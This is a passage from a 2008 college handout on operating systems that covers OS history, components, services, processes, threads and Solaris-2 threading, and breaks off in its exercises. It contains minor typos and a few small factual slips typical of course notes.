Download 2. Overview of Operating Systems

Document related concepts

Computer program wikipedia , lookup

Transcript
Microlink Information Technology
Department of Computer Science
Operating Systems
Prepared By:
Tewdros Sisay (M.Sc in Computer Science)
May 2008
Microlink Information Technology College
Mekelle Branch
Microlink Information Technology
College
Mekelle Branch
Department of Software Engineering
Operating Systems
Acronyms
ACL
CPU
FCFS
FIFO
I/O
LRU
LSI
LWP
MRU
OS
PC
PCB
PFF
RAM
SJF
SPN
SRT
TLB
Access Control List
Central Processing Unit
First-Come-First-Served
First-In-First-Out
Input/Output
List Recently Used
Large Scale Integration
Lightweight Processes
Most Recently Used
Operating System
Program Counter
Process Control Block
Page-Fault Frequency
Random Access Memory
Shortest-Job-First
Shortest-Process-Next
Shortest-Remaining-Time
Translation Look aside Buffer
ii
List of Tables
Table 4.1 Initial state of Banker’s algorithm
Table 4.2 Safe state of Banker’s algorithm
Table 4.3 Deadlock in Banker’s algorithm
Table 4.4 Unsafe state may not lead to deadlock
Table 4.5 Process scheduling exercise
Table 6.1 Wasteful allocation of disk space
iii
List of Figures
Figure 3.1 Creation of thread vs process
Figure 3.2 Implementation of threads in Solaris 2
Figure 4.1 Critical section
Figure 5.1 Memory allocation
Figure 5.2 Paging in memory management
Figure 5.3 Allocation of pages in page frames
Figure 5.4 Pages table management (a)
Figure 5.5 Pages table management (b)
Figure 5.6 Page frame allocation vs page fault rate
Figure 5.7 Number of process vs CPU utilization (a)
Figure 5.8 Number of process vs CPU utilization (b)
Figure 5.9 CLOCK algorithm flowchart
Figure 5.10 Implementation of memory allocation in Multics
Figure 6.1 Structure of I/O system
Figure 6.2 Device I/O addressing
Figure 6.3 I/O and CPU processing
Figure 6.4 Configuration of Hard-disk
iv
Preface
This teaching material is prepared to support the Operating System course offered in Computer
Science programs. It has been organized from textbooks, reference books, handouts prepared for the
course, Internet sources and other relevant materials.
It covers the basic design principles like the process concept, process management, inter-process
communication & synchronization, memory management, I/O management, file management, and
security. It also includes practical implementation examples, and exercises at all relevant parts of the
text.
v
Table of Contents
1. Introduction ............................................................................................................................1
1.1 Terminology...................................................................................................................... 1
1.2 Computer Systems Operation ........................................................................................... 1
1.3 Evolution of Operating Systems ....................................................................................... 2
1.4 Operating System Structure .............................................................................................. 3
2. Overview of Operating Systems ...........................................................................................5
2.1 Components of Operating Systems ................................................................................... 5
2.2 Operating Systems Services .............................................................................................. 7
2.3 Characteristics of Operating Systems ............................................................................... 9
3. Process Description ..............................................................................................................11
3.1 The Process Concept ....................................................................................................... 11
3.2 Process States .................................................................................................................. 12
3.3 Threads ............................................................................................................................ 16
3.4 Implementation ............................................................................................................... 21
3.5 Exercises ......................................................................................................................... 23
4. Process Management ...........................................................................................................26
4.1 CPU/Process Scheduling ................................................................................................ 26
4.2 Interprocess Communication .......................................................................................... 31
4.3 Process Synchronization ................................................................................................. 33
4.4 Deadlock ......................................................................................................................... 37
4.5 Implementation ............................................................................................................... 41
4.6 Exercises ......................................................................................................................... 43
5. Memory Management .........................................................................................................45
5.1 Memory Allocation ......................................................................................................... 45
5.2 Swapping......................................................................................................................... 51
5.3 Paging ............................................................................................................................. 52
5.4 Virtual Memory .............................................................................................................. 69
5.5 Segmentation................................................................................................................... 69
5.6 Implementation ............................................................................................................... 71
5.7 Exercise ........................................................................................................................... 77
6. Device Management .............................................................................................................81
6.1 I/O Devices ..................................................................................................................... 81
6.2 Device Addressing .......................................................................................................... 82
6.3 Device Accesses.............................................................................................................. 82
64. Overlapped I/O and CPU Processing .............................................................................. 83
6.5 Disk as an Example Device ............................................................................................ 83
6.6 Disk Controller and Disk Device Driver ........................................................................ 85
6.7 Exercises ......................................................................................................................... 86
7. File Management ..................................................................................................................89
7.1 General Concepts ............................................................................................................ 89
7.2 File System Structure ...................................................................................................... 92
7.3 Access Methods and Protection ...................................................................................... 93
7.4 Implementing File Systems............................................................................................. 98
7.5 Implementation ............................................................................................................. 106
vi
7.6 Exercises ....................................................................................................................... 127
8. Protection and Security .....................................................................................................131
8.1 User Security................................................................................................................. 131
8.2 Access Control Lists ..................................................................................................... 138
8.3 Cryptography ................................................................................................................ 142
8.4 Exercises ....................................................................................................................... 143
Bibliography ...........................................................................................................................145
vii
1. Introduction
1.1 Terminology
The 1960’s definition of an operating system is “the software that controls the hardware”.
However, today, due to microcode we need a better definition. We see an operating system as the
programs that make the hardware useable. In brief, an operating system is the set of programs
that controls a computer. Some examples of operating systems are UNIX, Mach, MS-DOS, MSWindows, Windows/NT, Chicago, OS/2, MacOS, VMS, MVS, and VM.
Controlling the computer involves software at several levels. We will differentiate kernel
services, library services, and application-level services, all of which are part of the operating
system. Processes run Applications, which are linked together with libraries that perform
standard services. The kernel supports the processes by providing a path to the peripheral
devices. The kernel responds to service calls from the processes and interrupts from the devices.
The core of the operating system is the kernel, a control program that functions in privileged
state, an execution context that allows all hardware instructions to be executed, reacting to
interrupts from external devices and to service requests and traps from processes. Generally, the
kernel is a permanent resident of the computer. It creates and terminates processes and responds
to their request for service.
1.2 Computer Systems Operation
Operating Systems are resource managers. The main resource is computer hardware in the form
of processors, storage, input/output devices, communication devices, and data. Some of the
operating system functions are: implementing the user interface, sharing hardware among users,
allowing users to share data among themselves, preventing users from interfering with one
another, scheduling resources among users, facilitating input/output, recovering from errors,
accounting for resource usage, facilitating parallel operations, organizing data for secure and
rapid access, and handling network communications.
1
1.3 Evolution of Operating Systems
Historically operating systems have been tightly related to the computer architecture, it is good
idea to study the history of operating systems from the architecture of the computers on which
they run.
Operating systems have evolved through a number of distinct phases or generations which
corresponds roughly to the decades.
The 1940's - First Generations
The earliest electronic digital computers had no operating systems. Machines of the time were so
primitive that programs were often entered one bit at time on rows of mechanical switches (plug
boards). Programming languages were unknown (not even assembly languages). Operating
systems were unheard off.
The 1950's - Second Generation
By the early 1950's, the routine had improved somewhat with the introduction of punch cards.
The General Motors Research Laboratories implemented the first operating systems in early
1950's for their IBM 701. The system of the 50's generally ran one job at a time. These were
called single-stream batch processing systems because programs and data were submitted in
groups or batches.
The 1960's - Third Generation
The systems of the 1960's were also batch processing systems, but they were able to take better
advantage of the computer's resources by running several jobs at once. So operating systems
designers developed the concept of multiprogramming in which several jobs are in main memory
at once; a processor is switched from job to job as needed to keep several jobs advancing while
keeping the peripheral devices in use.
For example, on the system with no multiprogramming, when the current job paused to wait for
other I/O operation to complete, the CPU simply sat idle until the I/O finished. The solution for
this problem that evolved was to partition memory into several pieces, with a different job in
each partition. While one job was waiting for I/O to complete, another job could be using the
CPU.
2
Another major feature in third-generation operating system was the technique called spooling
(simultaneous peripheral operations on line). In spooling, a high-speed device like a disk
interposed between a running program and a low-speed device involved with the program in
input/output. Instead of writing directly to a printer, for example, outputs are written to the disk.
Programs can run to completion faster, and other programs can be initiated sooner when the
printer becomes available, the outputs may be printed.
Note that spooling technique is much like thread being spun to a spool so that it may be later be
unwound as needed.
Another feature present in this generation was time-sharing technique, a variant of
multiprogramming technique, in which each user has an on-line (i.e., directly connected)
terminal. Because the user is present and interacting with the computer, the computer system
must respond quickly to user requests, otherwise user productivity could suffer. Timesharing
systems were developed to multiprogramming large number of simultaneous interactive users.
Fourth Generation
With the development of LSI (Large Scale Integration) circuits, chips, operating system entered
in the system entered in the personal computer and the workstation age. Microprocessor
technology evolved to the point that it becomes possible to build desktop computers as powerful
as the mainframes of the 1970s. Two operating systems have dominated the personal computer
scene: MS-DOS, written by Microsoft, Inc. for the IBM PC and other machines using the Intel
8088 CPU and its successors, and UNIX, which is dominant on the large personal computers
using the Motorola 6899 CPU family.
1.4 Operating System Structure
System Calls and System Programs
System calls provide an interface between the process and the operating system. System calls
allow user-level processes to request some services from the operating system which process
itself is not allowed to do. In handling the trap, the operating system will enter in the kernel
mode, where it has access to privileged instructions, and can perform the desired service on the
behalf of user-level process. It is because of the critical nature of operations that the operating
system itself does them every time they are needed. For example, for I/O a process involves a
3
system call telling the operating system to read or write particular area and this request is
satisfied by the operating system.
System programs provide basic functioning to users so that they do not need to write their own
environment for program development (editors, compilers) and program execution (shells). In
some sense, they are bundles of useful system calls.
Layered Approach Design
In this case the system is easier to debug and modify, because changes affect only limited
portions of the code, and programmer does not have to know the details of the other layers.
Information is also kept only where it is needed and is accessible only in certain ways, so bugs
affecting that data are limited to a specific module or layer.
Mechanisms and Policies
The policies what is to be done while the mechanism specifies how it is to be done. For instance,
the timer construct for ensuring CPU protection is mechanism. On the other hand, the decision of
how long the timer is set for a particular user is a policy decision.
The separation of mechanism and policy is important to provide flexibility to a system. If the
interface between mechanism and policy is well defined, the change of policy may affect only a
few parameters. On the other hand, if interface between these two is vague or not well defined, it
might involve much deeper change to the system.
Once the policy has been decided it gives the programmer the choice of using his/her own
implementation. Also, the underlying implementation may be changed for a more efficient one
without much trouble if the mechanism and policy are well defined. Specifically, separating
these two provides flexibility in a variety of ways. First, the same mechanism can be used to
implement a variety of policies, so changing the policy might not require the development of a
new mechanism, but just a change in parameters for that mechanism from a library of
mechanisms. Second, the mechanism can be changed for example, to increase its efficiency or to
move to a new platform, without changing the overall policy.
4
2. Overview of Operating Systems
2.1 Components of Operating Systems
Even though, not all systems have the same structure many modern operating systems share the
same goal of supporting the following types of system components.
Process Management. The operating system manages many kinds of activities ranging from user
programs to system programs like printer spooler, name servers, file server etc. Each of these
activities is encapsulated in a process. A process includes the complete execution context that is
the code, data, Program Counter, registers, OS resources in use etc.
It is important to note that a process is not a program. A process is only ONE instant of a
program in execution. There are many processes can be running the same program. The five
major activities of an operating system in regard to process management are

Creation and deletion of user and system processes.

Suspension and resumption of processes.

A mechanism for process synchronization.

A mechanism for process communication.

A mechanism for deadlock handling.
Main-Memory Management. Primary-Memory or Main-Memory is a large array of words or
bytes. Each word or byte has its own address. Main-memory provides storage that can be access
directly by the CPU. That is to say for a program to be executed, it must in the main memory.
The major activities of an operating in regard to memory-management are:

Keep track of which part of memory are currently being used and by whom.

Decide which processes are loaded into memory when memory space becomes available.

Allocate and deallocate memory space as needed.
File Management. A file is a collected of related information defined by its creator. Computer
can store files on the disk (secondary storage), which provide long term storage. Some examples
of storage media are magnetic tape, magnetic disk and optical disk. Each of these media has its
own properties like speed, capacity, and data transfer rate and access methods.
5
A file system normally organized into directories to ease their use. These directories may contain
files and other directions.
The five main major activities of an operating system in regard to file management are
1. The creation and deletion of files.
2. The creation and deletion of directions.
3. The support of primitives for manipulating files and directions.
4. The mapping of files onto secondary storage.
5. The back up of files on stable storage media.
I/O System Management. I/O subsystem hides the peculiarities of specific hardware devices
from the user. Only the device driver knows the peculiarities of the specific device to which it is
assigned.
Secondary-Storage Management. Generally speaking, systems have several levels of storage,
including primary storage, secondary storage and cache storage. Instructions and data must be
placed in primary storage or cache to be referenced by a running program. Because main
memory is too small to accommodate all data and programs, and its data are lost when power is
lost, the computer system must provide secondary storage to back up main memory. Secondary
storage consists of tapes, disks, and other media designed to hold information that will eventually
be accessed in primary storage (primary, secondary, cache) is ordinarily divided into bytes or
words consisting of a fixed number of bytes. Each location in storage has an address; the set of
all addresses available to a program is called an address space.
The three major activities of an operating system in regard to secondary storage management are:
1. Managing the free space available on the secondary-storage device.
2. Allocation of storage space when new files have to be written.
3. Scheduling the requests for memory access.
Networking. A distributed system is a collection of processors that do not share memory,
peripheral devices, or a clock. The processors communicate with one another through
communication lines called network. The communication-network design must consider routing
and connection strategies, and the problems of contention and security.
6
Protection System. If a computer system has multiple users and allows the concurrent execution
of multiple processes, then the various processes must be protected from one another's activities.
Protection refers to mechanism for controlling the access of programs, processes, or users to the
resources defined by a computer system.
Command Interpreter System. A command interpreter is an interface of the operating system
with the user. The user gives commands with are executed by operating system (usually by
turning them into system calls). The main function of a command interpreter is to get and
execute the next user specified command. Command-Interpreter is usually not part of the kernel,
since multiple command interpreters (shell, in UNIX terminology) may be support by an
operating system, and they do not really need to run in kernel mode. There are two main
advantages to separating the command interpreter from the kernel.
1. If we want to change the way the command interpreter looks, i.e., we want to change the
interface of command interpreter, we are able to do that if the command interpreter is
separate from the kernel. That is we cannot change the code of the kernel so we cannot
modify the interface.
2. If the command interpreter is a part of the kernel it is possible for a malicious process to
gain access to certain part of the kernel that it showed not have to avoid this ugly scenario
it is advantageous to have the command interpreter separate from kernel.
2.2 Operating Systems Services
Following are the five services provided by operating systems to the convenience of the users.
Program Execution. The purpose of a computer system is to allow the user to execute programs.
So the operating system provides an environment where the user can conveniently run programs.
The user does not have to worry about the memory allocation or multitasking or anything. These
things are taken care of by the operating systems.
Running a program involves the allocating and deallocating memory, CPU scheduling in case of
multiprocessor. These functions cannot be given to the user-level programs. So user-level
programs cannot help the user to run programs independently without the help from operating
systems.
I/O Operations. Each program requires an input and produces output. This involves the use of
I/O. The operating systems hides the user the details of underlying hardware for the I/O. All the
7
user sees is that the I/O has been performed without any details. So the operating systems by
providing I/O makes it convenient for the users to run programs.
For efficiently and protection users cannot control I/O so this service cannot be provided by userlevel programs.
File System Manipulation. The output of a program may need to be written into new files or
input taken from some files. The operating systems provide this service. The user does not have
to worry about secondary storage management. User gives a command for reading or writing to a
file and sees his or her task accomplished. Thus operating systems make it easier for user
programs to accomplish their task.
This service involves secondary storage management. The speed of I/O that depends on
secondary storage management is critical to the speed of many programs and hence it is best
relegated to the operating systems to manage it than giving individual users the control of it. It is
not difficult for the user-level programs to provide these services but for above mentioned
reasons it is best if this service s left with operating system.
Communications. There are instances where processes need to communicate with each other to
exchange information. It may be between processes running on the same computer or running on
the different computers. By providing this service the operating system relieves the user of the
worry of passing messages between processes. In case where the messages need to be passed to
processes on the other computers through a network it can be done by the user programs. The
user program may be customized to the specifics of the hardware through which the message
transits and provides the service interface to the operating system.
Error Detection. An error is one part of the system may cause malfunctioning of the complete
system. To avoid such a situation the operating system constantly monitors the system for
detecting the errors. This relieves the user of the worry of errors propagating to various part of
the system and causing malfunctioning.
This service cannot allow to be handled by user programs because it involves monitoring and in
cases altering area of memory or deallocation of memory for a faulty process. Or may be
relinquishing the CPU of a process that goes into an infinite loop. These tasks are too critical to
be handed over to the user programs. A user program if given these privileges can interfere with
the correct (normal) operation of the operating systems.
8
2.3 Characteristics of Operating Systems
Modern Operating systems generally have following three major goals. Operating systems
generally accomplish these goals by running processes in low privilege and providing service
calls that invoke the operating system kernel in high-privilege state.
To hide details of hardware by creating abstraction. An abstraction is software that hides lower
level details and provides a set of higher-level functions. An operating system transforms the
physical world of devices, instructions, memory, and time into virtual world that is the result of
abstractions built by the operating system. There are several reasons for abstraction. First, the
code needed to control peripheral devices is not standardized. Operating systems provide
subroutines called device drivers that perform operations on behalf of programs for example,
input/output operations. Second, the operating system introduces new functions as it abstracts the
hardware. For instance, operating system introduces the file abstraction so that programs do not
have to deal with disks. Third, the operating system transforms the computer hardware into
multiple virtual computers, each belonging to a different program. Each program that is running
is called a process. Each process views the hardware through the lens of abstraction.
Fourth, the operating system can enforce security through abstraction.
To allocate resources to processes. An operating system controls how processes (the active
agents) may access resources (passive entities)
Provide a pleasant and effective user interface. The user interacts with the operating systems
through the user interface and usually interested in the “look and feel” of the operating system.
The most important components of the user interface are the command interpreter, the file
system, on-line help, and application integration. The recent trend has been toward increasingly
integrated graphical user interfaces that encompass the activities of multiple processes on
networks of computers.
One can view Operating Systems from two points of views: Resource manager and extended
machines. Form Resource manager point of view Operating Systems manage the different parts
of the system efficiently and from extended machines point of view Operating Systems provide a
virtual machine to users that is more convenient to use. The structurally Operating Systems can
be design as a monolithic system, a hierarchy of layers, a virtual machine system, an exokernel,
or using the client-server model. The basic concepts of Operating Systems are processes,
memory management, I/O management, the file systems, and security.
9
10
3. Process Description
The notion of process is central to the understanding of operating systems. There are quite a few
definitions presented in the literature, but no "perfect" definition has yet appeared.
3.1 The Process Concept
The term "process" was first used by the designers of the MULTICS in 1960's. Since then, the
term process is used somewhat interchangeably with 'task' or 'job'. The process has been given
many definitions for instance

A program in Execution.

An asynchronous activity.

The 'animated sprit' of a procedure in execution.

The entity to which processors are assigned.

The 'dispatchable' unit.
and many more definitions have given. As we can see from above that there is no universally
agreed upon definition, but the definition "Program in Execution" seem to be most frequently
used. And this is a concept are will use in the present study of operating systems.
Now that we agreed upon the definition of process, the question is what is the relation between
process and program? It is same beast with different name or when this beast is sleeping (not
executing) it is called program and when it is executing becomes process. Well, to be very
precise. Process is not the same as program. In the following discussion we point out some of the
difference between process and program. As we have mentioned earlier.
Process is not the same as program. A process is more than a program code. A process is an
'active' entity as opposed to a program which is considered to be a 'passive' entity. As we all
know that a program is an algorithm expressed in some suitable notation, (e.g., programming
language). Being a passive, a program is only a part of process. Process, on the other hand,
includes:

Current value of Program Counter (PC)

Contents of the processors registers

Value of the variables
11

The process stack (SP) which typically contains temporary data such as subroutine
parameter, return address, and temporary variables.

A data section that contains global variables.
A process is the unit of work in a system.
In Process model, all software on the computer is organized into a number of sequential
processes. A process includes PC, registers, and variables. Conceptually, each process has its
own virtual CPU. In reality, the CPU switches back and forth among processes. (The rapid
switching back and forth is called multiprogramming).
3.2 Process States
The process state consist of everything necessary to resume the process execution if it is
somehow put aside temporarily. The process state consists of at least following:

Code for the program.

Program's static data.

Program's dynamic data.

Program's procedure call stack.

Contents of general purpose register.

Contents of program counter (PC)

Contents of program status word (PSW).

Operating Systems resource in use.
A process goes through a series of discrete process states.

New State: The process being created.

Running State: A process is said to be running if it has the CPU, that is, process actually
using the CPU at that particular instant.

Blocked (or waiting) State: A process is said to be blocked if it is waiting for some event
to happen such that as an I/O completion before it can proceed. Note that a process is
unable to run until some external event happens.
12

Ready State: A process is said to be ready if it use a CPU if one were available. A ready
state process is runable but temporarily stopped running to let another process run.

Terminated state: The process has finished execution.
The basic Process Operations are process creation and process termination. The details of these
operations are described below.
Process Creation. In general-purpose systems, some way is needed to create processes as needed
during operation. There are four principal events led to processes creation.

System initialization.

Execution of a process Creation System calls by a running process.

A user request to create a new process.

Initialization of a batch job.
Foreground processes interact with users. Background processes that stay in background sleeping
but suddenly springing to life to handle activity such as email, webpage, printing, and so on.
Background processes are called daemons. This call creates an exact clone of the calling process.
A process may create a new process by some create process such as 'fork'. It choose to does so,
creating process is called parent process and the created one is called the child processes. Only
one parent is needed to create a child process. Note that unlike plants and animals that use sexual
representation, a process has only one parent. This creation of process (processes) yields a
hierarchical structure of processes like one in the figure. Notice that each child has only one
parent but each parent may have many children. After the fork, the two processes, the parent and
the child, have the same memory image, the same environment strings and the same open files.
After a process is created, both the parent and child have their own distinct address space. If
either process changes a word in its address space, the change is not visible to the other process.
Following are some reasons for creation of a process

User logs on.

User starts a program.

Operating systems creates process to provide service, e.g., to manage printer.

Some program starts another process, e.g., Netscape calls xv to display a picture.
13
Process Termination. A process terminates when it finishes executing its last statement. Its
resources are returned to the system, it is purged from any system lists or tables, and its process
control block (PCB) is erased i.e., the PCB's memory space is returned to a free memory pool.
The new process terminates the existing process, usually due to following reasons:

Normal Exist. Most processes terminates because they have done their job. This call is
exist in UNIX.

Error Exist. When process discovers a fatal error. For example, a user tries to compile a
program that does not exist.

Fatal Error. An error caused by process due to a bug in program for example, executing
an illegal instruction, referring non-existing memory or dividing by zero.

Killed by another Process. A process executes a system call telling the Operating Systems
to terminate some other process. In UNIX, this call is killing. In some systems when a
process kills all processes it created are killed as well (UNIX does not work this way).
Process States. A process goes through a series of discrete process states.

New State. The process being created.

Terminated State. The process has finished execution.

Blocked (waiting) State. When a process blocks, it does so because logically it cannot
continue, typically because it is waiting for input that is not yet available. Formally, a
process is said to be blocked if it is waiting for some event to happen (such as an I/O
completion) before it can proceed. In this state a process is unable to run until some
external event happens.

Running State. A process is said t be running if it currently has the CPU, that is, actually
using the CPU at that particular instant.

Ready State. A process is said to be ready if it use a CPU if one were available. It is
runable but temporarily stopped to let another process run.
Logically, the 'Running' and 'Ready' states are similar. In both cases the process is willing to run,
only in the case of 'Ready' state, there is temporarily no CPU available for it. The 'Blocked' state
is different from the 'Running' and 'Ready' states in that the process cannot run, even if the CPU
is available.
14
Process State Transitions. The following are the six possible transitions among above mentioned
five states.

Transition 1 occurs when process discovers that it cannot continue. If running process
initiates an I/O operation before its allotted time expires, the running process voluntarily
relinquishes the CPU.
This state transition is: Block (process-name): Running → Block.

Transition 2 occurs when the scheduler decides that the running process has run long
enough and it is time to let another process have CPU time.
This state transition is: Time-Run-Out (process-name): Running → Ready.

Transition 3 occurs when all other processes have had their share and it is time for the
first process to run again. This state transition is: Dispatch (process-name): Ready →
Running.

Transition 4 occurs when the external event for which a process was waiting (such as
arrival of input) happens.
This state transition is: Wakeup (process-name): Blocked → Ready.

Transition 5 occurs when the process is created.
This state transition is: Admitted (process-name): New → Ready.

Transition 6 occurs when the process has finished execution.
This state transition is: Exit (process-name): Running → Terminated.
Process Control Block. A process in an operating system is represented by a data structure
known as a process control block (PCB) or process descriptor. The PCB contains important
information about the specific process including

The current state of the process i.e., whether it is ready, running, waiting, or whatever.

Unique identification of the process in order to track "which is which" information.

A pointer to parent process.

Similarly, a pointer to child process (if it exists).

The priority of process (a part of CPU scheduling information).
15

Pointers to locate memory of processes.

A register save area.

The processor it is running on.
The PCB is a certain store that allows the operating systems to locate key information about a
process. Thus, the PCB is the data structure that defines a process to the operating systems.
3.3 Threads
Despite of the fact that a thread must execute in process, the process and its associated threads
are different concept. Processes are used to group resources together and threads are the entities
scheduled for execution on the CPU.
A thread is a single sequence stream within in a process. Because threads have some of the
properties of processes, they are sometimes called lightweight processes. In a process, threads
allow multiple executions of streams. In many respect, threads are popular way to improve
application through parallelism. The CPU switches rapidly back and forth among the threads
giving illusion that the threads are running in parallel. Like a traditional process i.e., process with
one thread, a thread can be in any of several states (Running, Blocked, Ready or Terminated).
Each thread has its own stack. Since thread will generally call different procedures and thus a
different execution history. This is why thread needs its own stack. An operating system that has
thread facility, the basic unit of CPU utilization is a thread. A thread has or consists of a program
counter (PC), a register set, and a stack space. Threads are not independent of one other like
processes as a result threads shares with other threads their code section, data section, OS
resources also known as task, such as open files and signals.
Processes Vs Threads. As we mentioned earlier that in many respect threads operate in the same
way as that of processes. Some of the similarities and differences are:
Similarities

Like processes threads share CPU and only one thread active (running) at a time.

Like processes, threads within a processes, threads within a processes execute
sequentially.

Like processes, thread can create children.

And like process, if one thread is blocked, another thread can run.
16
Differences

Unlike processes, threads are not independent of one another.

Unlike processes, all threads can access every address in the task .

Unlike processes, thread are design to assist one other. Note that processes might or
might not assist one another because processes may originate from different users.
Following are some reasons why we use threads in designing operating systems.
1. A process with multiple threads make a great server for example printer server.
2. Because threads can share common data, they do not need to use interprocess
communication.
3. Because of the very nature, threads can take advantage of multiprocessors.
Threads are cheap in the sense that
1. They only need a stack and storage for registers therefore, threads are cheap to create.
2. Threads use very little resources of an operating system in which they are working. That
is, threads do not need new address space, global data, program code or operating system
resources.
3. Context switching are fast when working with threads. The reason is that we only have to
save and/or restore PC, SP and registers.
But this cheapness does not come free - the biggest drawback is that there is no protection
between threads.
User-Level Threads. User-level threads implement in user-level libraries, rather than via systems
calls, so thread switching does not need to call operating system and to cause interrupt to the
kernel. In fact, the kernel knows nothing about user-level threads and manages them as if they
were single-threaded processes.
Advantages. The most obvious advantage of this technique is that a user-level threads package
can be implemented on an Operating System that does not support threads. Some other
advantages are

User-level threads do not require modification to operating systems.
17

Simple Representation: Each thread is represented simply by a PC, registers, stack and a
small control block, all stored in the user process address space.

Simple Management: This simply means that creating a thread, switching between
threads and synchronization between threads can all be done without intervention of the
kernel.

Fast and Efficient: Thread switching is not much more expensive than a procedure call.
Disadvantage. There is a lack of coordination between threads and operating system kernel.
Therefore, process as whole gets one time slice irrespect of whether process has one thread or
1000 threads within. It is up to each thread to relinquish control to other threads.
User-level threads require non-blocking systems call i.e., a multithreaded kernel. Otherwise,
entire process will blocked in the kernel, even if there are runable threads left in the processes.
For example, if one thread causes a page fault, the process blocks.
Kernel-Level Threads. In this method, the kernel knows about and manages the threads. No
runtime system is needed in this case. Instead of thread table in each process, the kernel has a
thread table that keeps track of all threads in the system. In addition, the kernel also maintains
the traditional process table to keep track of processes. Operating Systems kernel provides
system call to create and manage threads.
Advantages. Because kernel has full knowledge of all threads, Scheduler may decide to give
more time to a process having large number of threads than process having small number of
threads. Kernel-level threads are especially good for applications that frequently block.
Disadvantages. The kernel-level threads are slow and inefficient. For instance, threads
operations are hundreds of times slower than that of user-level threads. Since kernel must
manage and schedule threads as well as processes, it require a full thread control block (TCB) for
each thread to maintain information about threads. As a result there is significant overhead and
increased in kernel complexity.
Advantages of Threads over Multiple Processes.

Context Switching. Threads are very inexpensive to create and destroy, and they are
inexpensive to represent. For example, they require space to store, the PC, the SP, and the
general-purpose registers, but they do not require space to share memory information,
Information about open files of I/O devices in use, etc. With so little context, it is much
18
faster to switch between threads. In other words, it is relatively easier for a context switch
using threads.

Sharing. Treads allow the sharing of a lot resources that cannot be shared in process, for
example, sharing code section, data section, Operating System resources like open file
etc.
Disadvantages of Threads over Multiple Processes.

Blocking. The major disadvantage if that if the kernel is single threaded, a system call of
one thread will block the whole process and CPU may be idle during the blocking period.

Security. Since there is, an extensive sharing among threads there is a potential problem
of security. It is quite possible that one thread over writes the stack of another thread (or
damaged shared data) although it is very unlikely since threads are meant to cooperate on
a single task.
Application that Benefits from Threads
A proxy server satisfying the requests for a number of computers on a LAN would be benefited
by a multi-threaded process. In general, any program that has to do more than one task at a time
could benefit from multitasking. For example, a program that reads input, process it, and outputs
could have three threads, one for each task.
Application that cannot benefit from Threads
Any sequential process that cannot be divided into parallel task will not benefit from thread, as
they would block until the previous one completes. For example, a program that displays the
time of the day would not benefit from multiple threads.
Resources used in Thread Creation and Process Creation
When a new thread is created it shares its code section, data section and operating system
resources like open files with other threads. But it is allocated its own stack, register set and a
program counter.
The creation of a new process differs from that of a thread mainly in the fact that all the shared
resources of a thread are needed explicitly for each process.
19
Figure 3.1 Creation of thread vs process
So though two processes may be running the same piece of code they need to have their own
copy of the code in the main memory to be able to run. Two processes also do not share other
resources with each other. This makes the creation of a new process very costly compared to that
of a new thread.
Context Switch
To give each process on a multi-programmed machine a fair share of the CPU, a hardware clock
generates interrupts periodically. This allows the operating system to schedule all processes in
main memory (using scheduling algorithm) to run on the CPU at equal intervals. Each time a
clock interrupt occurs, the interrupt handler checks how much time the current running process
has used. If it has used up its entire time slice, then the CPU scheduling algorithm (in kernel)
picks a different process to run. Each switch of the CPU from one process to another is called a
context switch.
Major Steps of Context Switching

The values of the CPU registers are saved in the process table of the process that was running
just before the clock interrupt occurred.

The registers are loaded from the process picked by the CPU scheduler to run next.
In a multi-programmed uni-processor computing system, context switches occur frequently
enough that all processes appear to be running concurrently. If a process has more than one
thread, the Operating System can use the context switching technique to schedule the threads so
they appear to execute in parallel. This is the case if threads are implemented at the kernel level.
Threads can also be implemented entirely at the user level in run-time libraries. Since in this case
no thread scheduling is provided by the Operating System, it is the responsibility of the
20
programmer to yield the CPU frequently enough in each thread so all threads in the process can
make progress.
Action of Kernel to Context Switch Among Threads
The threads share a lot of resources with other peer threads belonging to the same process. So a
context switch among threads for the same process is easy. It involves switch of register set, the
program counter and the stack. It is relatively easy for the kernel to accomplish this task.
Action of kernel to Context Switch Among Processes
Context switches among processes are expensive. Before a process can be switched its process
control block (PCB) must be saved by the operating system. The PCB consists of the following
information:

The process state.

The program counter, PC.

The values of the different registers.

The CPU scheduling information for the process.

Memory management information regarding the process.

Possible accounting information for this process.

I/O status information of the process.
When the PCB of the currently executing process is saved the operating system loads the PCB of
the next process that has to be run on CPU. This is a heavy task and it takes a lot of time.
3.4 Implementation
The Solaris-2 Operating Systems is a multithreaded operating environment with threads at userlevel, Intermediate-level and kernel-level. It also supports symmetric multiprocessing and realtime scheduling. The entire thread system in Solaris is depicted in following figure.
21
Figure 3.2 Implementation of threads in Solaris 2
At user-level

The user-level threads are supported by a library for the creation and scheduling and
kernel knows nothing of these threads.

These user-level threads are supported by lightweight processes (LWPs). Each LWP is
connected to exactly one kernel-level thread is independent of the kernel.

Many user-level threads may perform one task. These threads may be scheduled and
switched among LWPs without intervention of the kernel.

User-level threads are extremely efficient because no context switch is needs to block one
thread another to start running.
Resource needs of User-level Threads

A user-thread needs a stack and program counter. Absolutely no kernel resource are
required.

Since the kernel is not involved in scheduling these user-level threads, switching among
user-level threads are fast and efficient.
At Intermediate-level
The lightweight processes (LWPs) are located between the user-level threads and kernel-level
threads. These LWPs serve as a "Virtual CPUs" where user-threads can run. Each task contains
at least one LWP. The user-level threads are multiplexed on the LWPs of the process.
22
Resource needs of LWP
A LWP contains a process control block (PCB) with register data, accounting information and
memory information. Therefore, switching between LWPs requires quite a bit of work and
LWPs are relatively slow as compared to user-level threads.
At kernel-level
The standard kernel-level threads execute all operations within the kernel. There is a kernel-level
thread for each LWP and there are some threads that run only on the kernels behalf and have
associated LWP. For example, a thread to service disk requests. By request, a kernel-level thread
can be pinned to a processor (CPU). See the rightmost thread in figure. The kernel-level threads
are scheduled by the kernel's scheduler and user-level threads blocks.
In modern solaris-2 a task no longer must block just because a kernel-level threads blocks, the
processor (CPU) is free to run another thread.
Resource needs of Kernel-level Thread
A kernel thread has only small data structure and stack. Switching between kernel threads does
not require changing memory access information and therefore, kernel-level threads are relating
fast and efficient.
3.5 Exercises
1. Palm OS provides no means of concurrent processing. Discuss three major complications
that concurrent processing adds to an operating system.
Answer:
(a) A method of time sharing must be implemented to allow each of several processes to
have access to the system. This method involves the preemption of processes that do not
voluntarily give up the CPU and the kernel being reentrant.
(b) Processes and system resources must have protections and must be protected from each
other. Any given process must be limited in the amount of memory it can use and the
operations it can perform on devices like disks.
(c) Care must be taken in the kernel to prevent deadlocks between processes, so processes
aren’t waiting for each other’s allocated resources.
23
2. When a process in Linux OS creates a new process using the fork () operation, which of the
following state is shared between the parent process and the child process? Stack, Heap or
Shared memory segments.
Answer:
